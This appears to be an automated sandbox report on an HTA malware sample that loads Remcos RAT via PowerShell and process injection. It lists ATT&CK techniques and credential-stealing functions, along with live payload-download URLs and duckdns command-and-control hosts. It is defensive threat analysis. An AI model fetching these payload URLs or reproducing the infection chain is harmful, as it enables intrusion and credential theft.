                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword16_2_004033F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword16_2_00402DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword16_2_00402DB3
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6412, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UCDCW8
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4545370630.00000000026AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe11_2_0040569A
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts11
                      Native API
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      2
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      1
                      Bypass User Account Control
                      2
                      Obfuscated Files or Information
                      211
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Data from Local System
                      21
                      Encrypted Channel
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts122
                      Command and Scripting Interpreter
                      1
                      Windows Service
                      1
                      Access Token Manipulation
                      1
                      Software Packing
                      2
                      Credentials in Registry
                      1
                      System Service Discovery
                      SMB/Windows Admin Shares11
                      Email Collection
                      1
                      Remote Access Software
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution
                      Login Hook1
                      Windows Service
                      1
                      DLL Side-Loading
                      3
                      Credentials In Files
                      3
                      File and Directory Discovery
                      Distributed Component Object Model211
                      Input Capture
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts4
                      PowerShell
                      Network Logon Script422
                      Process Injection
                      1
                      Bypass User Account Control
                      LSA Secrets39
                      System Information Discovery
                      SSH3
                      Clipboard Data
                      213
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials31
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Virtualization/Sandbox Evasion
                      DCSync21
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation
                      Proc Filesystem4
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt422
                      Process Injection
                      /etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536103 Sample: nicetokissthebestthingsiwan... Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 63 dantata.duckdns.org 2->63 65 danbana.duckdns.org 2->65 67 2 other IPs or domains 2->67 87 Suricata IDS alerts for network traffic 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 95 22 other signatures 2->95 12 mshta.exe 1 2->12         started        signatures3 93 Uses dynamic DNS services 65->93 process4 signatures5 119 Detected Cobalt Strike Beacon 12->119 121 Suspicious powershell command line found 12->121 123 PowerShell case anomaly found 12->123 15 powershell.exe 3 39 12->15         started        process6 dnsIp7 77 107.175.229.138, 49704, 49715, 80 AS-COLOCROSSINGUS United States 15->77 55 seethebestpicturew...atthingsinlinea.vbS, Unicode 15->55 dropped 57 C:\Users\user\AppData\...\1nlzjhnh.cmdline, Unicode 15->57 dropped 79 Detected Cobalt Strike Beacon 15->79 81 Suspicious powershell command line found 15->81 83 Obfuscated command line found 15->83 85 2 other signatures 15->85 20 wscript.exe 1 15->20         started        23 powershell.exe 21 15->23         started        25 csc.exe 3 15->25         started        28 conhost.exe 15->28         started        file8 signatures9 process10 file11 97 Detected Cobalt Strike Beacon 20->97 99 Suspicious powershell command line found 20->99 101 Wscript starts Powershell (via cmd or directly) 20->101 105 3 other signatures 20->105 30 powershell.exe 7 20->30         started        103 Loading BitLocker PowerShell Module 23->103 59 C:\Users\user\AppData\Local\...\1nlzjhnh.dll, PE32 25->59 dropped 33 cvtres.exe 1 25->33         started        signatures12 process13 signatures14 125 Detected Cobalt Strike Beacon 30->125 127 Suspicious powershell command line found 30->127 129 Obfuscated command line found 30->129 35 powershell.exe 15 15 30->35         started        39 conhost.exe 30->39         started        process15 dnsIp16 69 raw.githubusercontent.com 185.199.108.133, 443, 49706 FASTLYUS Netherlands 35->69 107 Writes to foreign memory regions 35->107 109 Injects a PE file into a foreign processes 35->109 41 RegAsm.exe 35->41         started        signatures17 process18 dnsIp19 71 danbana.duckdns.org 192.169.69.26, 49721, 49724, 9674 WOWUS United States 41->71 73 dantata.duckdns.org 192.3.101.153, 49727, 49730, 9764 AS-COLOCROSSINGUS United States 41->73 75 geoplugin.net 178.237.33.50, 49731, 80 ATOM86-ASATOM86NL Netherlands 41->75 61 C:\ProgramData\remcos\logs.dat, data 41->61 dropped 111 Contains functionality to bypass UAC (CMSTPLUA) 41->111 113 Detected Remcos RAT 41->113 115 Tries to steal Mail credentials (via file registry) 41->115 117 8 other signatures 41->117 46 RegAsm.exe 41->46         started        49 RegAsm.exe 41->49         started        51 RegAsm.exe 41->51         started        53 2 other processes 41->53 file20 signatures21 process22 signatures23 131 Tries to steal Instant Messenger accounts or passwords 46->131 133 Tries to steal Mail credentials (via file / registry access) 46->133 135 Tries to harvest and steal browser information (history, passwords, etc) 49->135

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      nicetokissthebestthingsiwantotgetmebackwith.hta11%ReversingLabsScript-WScript.Trojan.Asthma
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      https://aka.ms/winsvr-2022-pshelp0%URL Reputationsafe
                      http://www.imvu.comr0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      https://go.micro0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      http://www.imvu.com0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://go.micros0%URL Reputationsafe
                      http://geoplugin.net/json.gp0%URL Reputationsafe
                      http://crl.micro0%URL Reputationsafe
                      http://geoplugin.net/json.gp/C0%URL Reputationsafe
                      https://aka.ms/pscore6lB0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      https://login.yahoo.com/config/login0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      http://www.ebuddy.com0%URL Reputationsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      raw.githubusercontent.com
                      185.199.108.133
                      truetrue
                        unknown
                        geoplugin.net
                        178.237.33.50
                        truefalse
                          unknown
                          dantata.duckdns.org
                          192.3.101.153
                          truetrue
                            unknown
                            danbana.duckdns.org
                            192.169.69.26
                            truetrue
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgtrue
                                unknown
                                http://geoplugin.net/json.gpfalse
                                • URL Reputation: safe
                                unknown
                                dantata.duckdns.orgtrue
                                  unknown
                                  danbana.duckdns.orgtrue
                                    unknown
                                    http://107.175.229.138/550/MNCCDR.txttrue
                                      unknown
                                      http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIFtrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIFmpowershell.exe, 00000001.00000002.2235693173.00000000030BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://raw.githubusercontent.com/CryptersAndToolsOfpowershell.exe, 00000009.00000002.2350550754.0000000002F21000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2350460443.0000000000CD0000.00000004.00000020.00020000.00000000.sdmptrue
                                            unknown
                                            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2243987921.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2129498624.0000000006299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.imvu.comrRegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgtpowershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://go.micropowershell.exe, 00000001.00000002.2237686078.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.00000000057AD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://login.liRegAsm.exe, 0000000D.00000002.2591863343.000000000071C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://contoso.com/Licensepowershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://geoplugin.net/json.gphyRegAsm.exe, 0000000B.00000002.4544142973.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    http://www.imvu.comRegAsm.exe, RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://contoso.com/Iconpowershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://raw.githubusercontent.com/cryptersandtoolsofpowershell.exe, 00000009.00000002.2386117984.0000000007692000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://www.nirsoft.netRegAsm.exe, 0000000D.00000002.2592039301.0000000000AF4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://107.175.229.138powershell.exe, 00000009.00000002.2352442051.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000005256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://go.microspowershell.exe, 00000003.00000002.2127498822.0000000005969000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              unknown
                                                              https://www.google.comRegAsm.exe, RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                unknown
                                                                http://crl.micropowershell.exe, 00000001.00000002.2235693173.00000000030BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://raw.githubusercontent.compowershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  unknown
                                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2237686078.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2127498822.0000000005231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2470578415.0000000004D17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2470578415.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000004F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://107.175.229.138/550/MNCCDXpowershell.exe, 00000009.00000002.2352442051.0000000005256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://contoso.com/powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2243987921.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2129498624.0000000006299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://geoplugin.net/json.gpge0RegAsm.exe, 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://107.175.229powershell.exe, 00000009.00000002.2352442051.0000000005256000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                                                                          unknown
                                                                          https://login.yahoo.com/config/loginRegAsm.exefalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://geoplugin.net/json.gpXRegAsm.exe, 0000000B.00000002.4544142973.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://raw.githubusercontent.com/Cryppowershell.exe, 00000009.00000002.2386646006.00000000077FE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              unknown
                                                                              http://www.nirsoft.net/RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2237686078.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2127498822.0000000005231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2470578415.0000000004D17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000004F31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                107.175.229.138
                                                                                unknownUnited States
                                                                                36352AS-COLOCROSSINGUStrue
                                                                                185.199.108.133
                                                                                raw.githubusercontent.comNetherlands
                                                                                54113FASTLYUStrue
                                                                                178.237.33.50
                                                                                geoplugin.netNetherlands
                                                                                8455ATOM86-ASATOM86NLfalse
                                                                                192.169.69.26
                                                                                danbana.duckdns.orgUnited States
                                                                                23033WOWUStrue
                                                                                192.3.101.153
                                                                                dantata.duckdns.orgUnited States
                                                                                36352AS-COLOCROSSINGUStrue
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1536103
                                                                                Start date and time:2024-10-17 16:03:37 +02:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 10m 56s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:18
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:nicetokissthebestthingsiwantotgetmebackwith.hta
                                                                                Detection:MAL
                                                                                Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@29/23@6/5
                                                                                EGA Information:
                                                                                • Successful, ratio: 55.6%
                                                                                HCA Information:
                                                                                • Successful, ratio: 99%
                                                                                • Number of executed functions: 183
                                                                                • Number of non-executed functions: 308
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .hta
                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Execution Graph export aborted for target mshta.exe, PID 1848 because there are no executed function
                                                                                • Execution Graph export aborted for target powershell.exe, PID 1732 because it is empty
                                                                                • Execution Graph export aborted for target powershell.exe, PID 4408 because it is empty
                                                                                • Execution Graph export aborted for target powershell.exe, PID 940 because it is empty
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                • VT rate limit hit for: nicetokissthebestthingsiwantotgetmebackwith.hta
                                                                                TimeTypeDescription
                                                                                10:04:34API Interceptor107x Sleep call for process: powershell.exe modified
                                                                                10:05:28API Interceptor5694494x Sleep call for process: RegAsm.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                107.175.229.138SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 107.175.229.138/550/MNCCDR.txt
                                                                                185.199.108.133cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                gaber.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                                178.237.33.50rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • geoplugin.net/json.gp
                                                                                Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • geoplugin.net/json.gp
                                                                                SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                New Order.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • geoplugin.net/json.gp
                                                                                17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • geoplugin.net/json.gp
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                raw.githubusercontent.comSWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 185.199.109.133
                                                                                Orden de Compra No. 434565344657.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.110.133
                                                                                TNT Receipt_ 09004105.xlsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                niceworkfornicepeopleswhoknowmewell.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                • 185.199.108.133
                                                                                seethebstthingstogetwithentirethingstobegret.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                • 185.199.109.133
                                                                                New PO-RFQ14101524CM.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                • 185.199.110.133
                                                                                New PO-RFQ14101524.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                • 185.199.108.133
                                                                                ADVANCE TT.xlsGet hashmaliciousUnknownBrowse
                                                                                • 185.199.111.133
                                                                                zapretka.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.110.133
                                                                                baks-zapret.exeGet hashmaliciousUnknownBrowse
                                                                                • 185.199.109.133
                                                                                danbana.duckdns.orgSWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 192.169.69.26
                                                                                17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 192.3.101.153
                                                                                dantata.duckdns.orgSWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 192.3.101.153
                                                                                geoplugin.netrIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 178.237.33.50
                                                                                Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                SKU_0001710-1-2024-SX-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 178.237.33.50
                                                                                SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                New Order.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                • 178.237.33.50
                                                                                17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                • 178.237.33.50
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                WOWUSSWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                • 192.169.69.26
